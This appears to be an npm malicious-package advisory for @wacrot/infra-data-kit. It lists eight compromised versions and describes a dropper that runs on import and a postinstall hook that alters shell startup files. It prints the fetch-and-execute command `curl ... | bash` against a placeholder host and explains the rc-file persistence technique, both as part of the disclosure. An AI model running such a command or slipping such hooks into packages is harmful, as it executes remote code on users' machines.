npm · Malicious package advisory
Malware@wacrot/infra-data-kit
MAL-2026-5834
Malicious code in @wacrot/infra-data-kit (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1) On any `require()` or `import` of @wacrot/infra-data-kit, src/index.js invokes addSupport() at module top level, which spawns a detached `bash -c 'curl -fsSL https://example.com/script.sh | bash'` via node:child_process with stdio ignored and errors swallowed by empty catch blocks. This is a textbook fetch-and-execute dropper embedded in a package advertised as a GeoJSON / data utility, and it fires automatically on import with no user consent or verification. Separately, package.json declares a postinstall hook (`npx no-install @wacrot/infra-data-kit npm run scripts/setup.js`) which executes scripts/setup.js at install time. setup.js locates the first of ~/.zshrc, ~/.bashrc, ~/.profile, makes a.bak copy, and inserts a new line into the file. The current inserted line is benign (`export MY_CUSTOM_VAR='test'`), but the primitive is silent, persistent modification of the installer's shell rc files on every install — the standard mechanism for attacker persistence via PATH/alias/source hooks. The atypical postinstall invocation through `npx no-install` further obscures lifecycle inspection. The destination URL `https://example.com/script.sh` is a placeholder; the mechanism is fully wired and any future republish or DNS pivot delivers attacker-controlled shell code to every installer.
Compromised versions (8)
- 2.1.0
- 2.0.6
- 2.1.4
- 2.0.9
- 2.0.8
- 2.0.7
- 2.1.1
- 2.1.2
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.